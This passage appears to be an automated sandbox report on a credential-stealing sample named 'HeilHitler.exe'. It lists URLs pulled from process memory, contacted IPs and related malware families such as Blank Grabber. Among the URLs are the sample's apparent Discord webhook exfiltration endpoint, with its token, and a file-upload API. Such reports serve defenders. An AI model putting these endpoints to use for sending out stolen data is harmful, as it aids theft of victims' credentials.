                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syHeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://MD8.mozilla.org/1/mHeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://ocsp.sectigo.com0$HeilHitler.exefalse
                                                                                                            		high
                                                                                                            https://bugzilla.moHeilHitler.exe, 00000001.00000002.2032762896.000001BD43DE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tools.ietf.org/html/rfc6125#section-6.4.3HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1766127413.0000026DB0E39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://google.com/mailHeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyHeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.google.com/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://foss.heptapod.net/pypy/pypy/-/issues/3539HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434A6000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1753590052.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434A7000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434A4000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://google.com/HeilHitler.exe, 00000001.00000002.2028781492.000001BD43623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFHeilHitler.exe, 00000001.00000003.1741897379.000001BD4379F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1751574081.000001BD4379F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://ocsp.sectigo.com0HeilHitler.exe, rar.exe.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.python.org/download/releases/2.3/mro/.HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://discordapp.com/api/v9/users/HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42BF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgRHeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#HeilHitler.exefalse
                                                                                                                                                    		high
                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920HeilHitler.exe, 00000001.00000002.2031557342.000001BD43A30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17HeilHitler.exe, 00000001.00000003.1907543224.000001BD434D3000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434A1000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsCHeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataHeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://yahoo.com/HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.microsoftOWNLO~1.TXTy.HeilHitler.exe, 00000001.00000003.2021328315.000001BD43658000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2030548396.000001BD4365F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021194278.000001BD43652000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2021471863.000001BD4365E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://account.bellmedia.cHeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6HeilHitler.exe, 00000001.00000002.2026948270.000001BD43481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://login.microsoftonline.comHeilHitler.exe, 00000001.00000002.2032925274.000001BD44544000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1761523281.000001BD4377A000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763010385.000001BD4377B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://html.spec.whatwg.org/multipage/HeilHitler.exe, 00000001.00000002.2024405519.000001BD43090000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1752805888.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717535771.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1732575141.000001BD43091000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1748948213.000001BD43091000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsHeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.zhihu.com/HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHeilHitler.exe, 00000001.00000003.1907001507.000001BD43734000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907174052.000001BD43738000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.rfc-editor.org/rfc/rfc8259#section-8.1HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD4348C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD43498000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://contoso.com/powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://oneget.orgXpowershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://api.gofile.io/getServerHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0HeilHitler.exefalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000007.00000002.1838904578.0000026DC92AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngHeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000026.00000002.1830812751.000002871CD42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://sectigo.com/CPS0HeilHitler.exe, rar.exe.0.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoHeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.amazon.co.uk/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://ocsp.thawte.com0HeilHitler.exe, 00000000.00000003.1680320755.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://json.orgHeilHitler.exe, 00000001.00000003.2021033088.000001BD43107000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.python.org/dev/peps/pep-0205/HeilHitler.exe, 00000000.00000003.1678922666.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.wykop.pl/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packageHeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2022974911.000001BD42C7C000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://twitter.com/HeilHitler.exe, 00000001.00000002.2027310965.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1723921949.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1763679896.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2018427043.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1907543224.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1717805882.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1750384495.000001BD434BC000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1737287565.000001BD434BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://www.olx.pl/HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://support.mozilla.org/products/firefoxHeilHitler.exe, 00000001.00000003.1723565686.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718377608.000001BD43757000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1718513847.000001BD436DA000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1720857356.000001BD43737000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2026948270.000001BD43330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      208.95.112.1
                                                                                                                                                                                                                      		ip-api.comUnited States
                                                                                                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                                                                                                      162.159.128.233
                                                                                                                                                                                                                      		discord.comUnited States
                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1556385
                                                                                                                                                                                                                      Start date and time:2024-11-15 10:43:10 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 11m 50s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:88
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:HeilHitler.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@139/52@2/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 60%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 95%
                                                                                                                                                                                                                      • Number of executed functions: 127
                                                                                                                                                                                                                      • Number of non-executed functions: 177
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.67, 52.149.20.212, 20.3.187.198, 13.95.31.18, 40.69.42.241
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
                                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                      • VT rate limit hit for: HeilHitler.exe

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      04:44:05API Interceptor113x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                      04:44:07API Interceptor5x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      208.95.112.1akame.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      HBL,MBL CN MBL NO.OOLU274.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                      • ip-api.com/line/
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                      • ip-api.com/line/
                                                                                                                                                                                                                      https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • ip-api.com/json
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • ip-api.com/line/
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • ip-api.com/line/
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • ip-api.com/line/
                                                                                                                                                                                                                      162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                                      • discord.com/phpMyAdmin/

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      ip-api.comakame.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      HBL,MBL CN MBL NO.OOLU274.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
